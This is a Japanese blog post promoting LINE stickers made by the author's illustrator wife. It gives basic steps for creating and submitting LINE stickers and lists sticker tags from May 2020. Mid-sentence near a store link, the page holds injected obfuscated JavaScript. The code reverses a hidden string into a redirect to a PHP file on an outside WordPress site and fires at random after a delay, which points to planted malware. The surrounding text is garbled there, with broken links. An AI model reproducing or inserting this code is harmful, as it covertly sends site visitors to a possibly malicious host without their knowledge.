LINEスタンプをイラストレーター栞子さんに作ってもらいました

LINEスタンプをイラストレーター栞子さんに作ってもらいました

Entertainer MIKIYAのLINEスタンプの紹介

イラストレーター栞子さん(リアル嫁)にLINEスタンプを作ってもらいました↓

tore.line.me/stickershop/product/11637335/ja

「おはよう」「おやすみ」「ありがとう」とか挨拶的なものから、マジックやってるのとか、ハムスターが出てくるのとかよくわからないものまで全部で40個あります。

Entertainer MIKIYAやイラストレーター栞子を応援してくださる方は、上のリンクから購入お願いします!!!

「Entertainer MIKIYA」「マジシャン ミキヤ」「大道芸人 ミキヤ」あたりで検索して頂いてもすぐに出てきます。

よくEntertainerのスペルを間違える人がいるので、ややこしかったらカタカナで検索してください。

イラストレーター栞子(かんこ)の紹介

イラストレーター栞子は、2017年よりフリーランスイラストレーターとして活動しており、 絵本のような柔らかなタッチ感とあたたかみのある色調のイラストが得意です。

書籍のカットイラストや4コマ漫画、雑貨のイラスト/デザインなどを手がけております。

最近のお仕事は、こちらです。

ちなみに、

も作っております。

作成のご依頼ございましたら、ぼくに連絡くださっても大丈夫です。

栞子のWEBサイトはこちらです。

https://kankopupu.com/

「ほっこり系イラストレーター」で検索して頂いても出てくるはずです。

副業としてLINEスタンプ作るのもアリ?

LINEスタンプだけで年間数千万稼いでいる人もいるらしく、なかなか夢のある仕事でもあります。

コロナウィルスが蔓延するいまの時期には、ぴったりの仕事なのかもしれません。

自宅ですべての仕事が完結します。

ただ、LINEスタンプで生計を成り立たせるには、それなりの戦略が必要になるかと思います。

ターゲット層の絞り込み、リリースのタイミング、宣伝方法、販売地域、シリーズ化などぱっと思いつくだけでも色々あります。

これらを考えるとなかなかしんどいので、とりあえず自分も使いたいし、ファンの人も使いやすいスタンプを作ろうということで作ったのが$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tore.line.me/stickershop/product/1471998/ja”>https://store.line.me/stickershop/product/1471998/ja

  • tore.line.me/stickershop/product/8479964/ja
  • LINEスタンプの作り方

    まあ、↓ここに書いてある通りに作ればいいだけなんです。

    tor.line.me/ja/guideline/sticker/

    スタンプの数は8個、16個、24個、32個、40個の中から選べるのですが、とりあえず作ってみたいってことなら8個だけでも作れます。

    ちなみに

    そして、以下のものはNGです

    • 日常会話で使用しにくいもの(例:物体、景色など)
    • 視認性が悪いもの(例:横長な画像や、8頭身キャラクターの全身など)
    • スタンプ全体のバランスを著しく欠いているもの(例:淡色ばかりのもの、単なる数字の羅列など)
    • 公序良俗に反するもの、未成年者の飲酒喫煙を想起するもの、性的表現、暴力的表現、ナショナリズムを煽るもの

    あとは、8~40個のスタンプの画像以外にも、横240px × 縦240pxのメイン画像(main.png)と横96px × 縦74pxのトークルームタブ画像(tab.png)が必要です。

    画像はzipファイルにまとめてアップすることもできます。

    スタンプタイトルとかスタンプ説明文とかは指示に従っていけばいいだけなので、画像ができたらLINE CREATORS MARKETのサイト↓に行って、アップすればオッケーです。

    tor.line.me/ja/

    注意点としては、販売地域からインドネシアは外しておいた方がいいです。

    インドネシアの審査はかなり厳しいようです。

    そういうことを知らずに、ぼくのスタンプも一度リジェクトをくらいました。

    簡単にスタンプが作れるアプリ

    パソコンにあまり詳しくない人にとって、上に書いてあるようなことの意味がわからないということもあると思います。

    写真などを使って簡単にスタンプを作れるスマホアプリもあるみたいです。

    LINEスタンプメーカー(AppleLINEスタンプのアイデアの出し方

    自分のLINEスタンプ40個とミスターユーのLINEスタンプ40個は全部ぼくがアイデアを考えました。

    この作業がなかなか大変です!

    でも、ヒントはLINEスタンプを作ってアップするときにつけるタグにあります。(一度もアップしていない人はタグの意味わからないかもしれませんが、アップしたらすぐ意味がわかります。)

    その中から作っていけば40個くらいのアイデアは出せるかと思います。

    以下2020年5月12日時点のタグ一覧です。

    LINEスタンプのタグ一覧(2020.5.12時点)

    会話

    任せた すみません バイバイ
    すごい 半端ない だめ
    NG 了解 承認
    承知 さすが お見事
    やるね いいなー いただきます
    ごちそうさま やった じゃあね
    構って バカな なんと
    あらま えー げっ
    許さない きたー ありがとう
    どういたしまして 感謝 助かる
    お願いします がっかり ちーん
    ごめんなさい またね 素晴らしい
    NO YES 忙しい
    はーい OK いいね
    おめでとう こんにちは さようなら
    こんばんは おはよう いってらっしゃい
    おかえり ただいま いってきます
    ようこそ おまたせ 待ってる
    待ってた おやすみ 眠い
    よろしく 何してる?
    おつかれさま 愛してる 恥ずかしい
    うける 面白い 恐ろしい
    引く 無理 心配
    まじか なるほど
    ファイト 大丈夫 本当
    元気? どうしよう うーん
    まったり わかった わかるわかる
    かわいい そんな ありえない
    本気 はぁ? いやいや
    こらー えっへん どんまい
    内緒 ほほう はぁ
    問題ない お祝い しまった
    塞ぐ おいしい 申し訳ない
    何でもない ふむふむ ガンバレ
    頑張る 何故 だるい
    うはうは 辛い それな
    面倒 真面目 しっかり
    まさか    

    表現

    !! !? アホ
    ラッキー わいわい 照れる
    てへ ハハハ フフフ
    えへへ プププ ぺろ
    ガクブル びっくり ゾクゾク
    呆然 唖然 無念
    ドキドキ こっそり キュート
    ゆるい 復活 シュール
    ちゃらい 衝撃 ひそひそ
    しんどい 気合 きらきら
    元気 緊急 ひやひや
    限界 残念 断る
    疲れた どんより ハート
    ショック もぐもぐ パクパク
    じゅるり しんみり ちくしょー
    チェッ ぷんぷん ピキピキ
    カチーン ごはん 空腹
    腹ペコ わーい のんびり
    ラブラブ ピンチ ぐすん
    ぎくり あわあわ キョトン
    すやすや ぽかーん うきうき
    ラブリー プレッシャー カップル
    動揺 ルンルン
    オーマイガー もうすぐ しょんぼり
    ピース あぶない 幸せ
    幸運 満足 満腹
    爆発 ノリノリ キュン
    萌える もじもじ バテる
    一番 馬鹿 やばい
    寝る ワクテカ おろおろ
    贈る ダッシュ 今行く
    逃走 ふらふら 隠れる
    遊ぶ 応援 ぺこり
    しくしく そわそわ あくび
    だらだら 休憩 テンパる
    イチャイチャ マッハ 起きる
    じーっ ツッコミ 謝る
    怒る    

    感情

    悔しい 楽しい ときめく
    泣く 困る 不安
    必死 一生懸命 最高
    好き 笑う 吹く
    にっこり 悲しい 寂しい
    怖い 震える 呆れる
    やれやれ しらける 憂鬱
    冷静 焦る
    甘える 腹が立つ どや
    にやにや えーん ひゃっほー
    興奮 うらやましい 不満
    号泣 弱った わくわく
    パニック あちゃー がーん
    落ち込む 嬉しい 驚く
    期待 不機嫌 和む
    とほほ 後悔 感激
    へこむ むかつく いらいら
    キレる イエイ  

    行動

    はしゃぐ 浮かれる 惚れる
    慌てる 威張る 爆睡
    食事 誤爆 料理
    拍手 慰める 拒否
    却下 うろうろ 爆笑
    あたふた バンザイ 落ち着く
    悩む 急ぐ くすくす
    考える 走る 反省
    覗く 頼む ぐったり
    食べる    

    その他

    ギャグ 誕生日 既読
    未読 既読無視 顔文字
    方言 プレゼント 毒舌
    真顔 変顔 体調不良
    キス 遅刻
    電話 連絡  

    年末年始キャンペーン

    よいお年を 初詣 帰省中です
    令和2年 元旦 昨年は大変お世話になりました
    正月太り 2020 子年(ねずみどし)
    謹賀新年 お年玉 海外旅行中です
    お正月 年越し 年末
    大晦日 今年もよろしく(ことよろ) 賀正
    明けましておめでとう(あけおめ) こちらこそ  

    さいごに

    色々書いてきましたが、何が言いたいかというと、、、

    LINEスタンプ買ってください!!!

    tore.line.me/stickershop/product/11637335/ja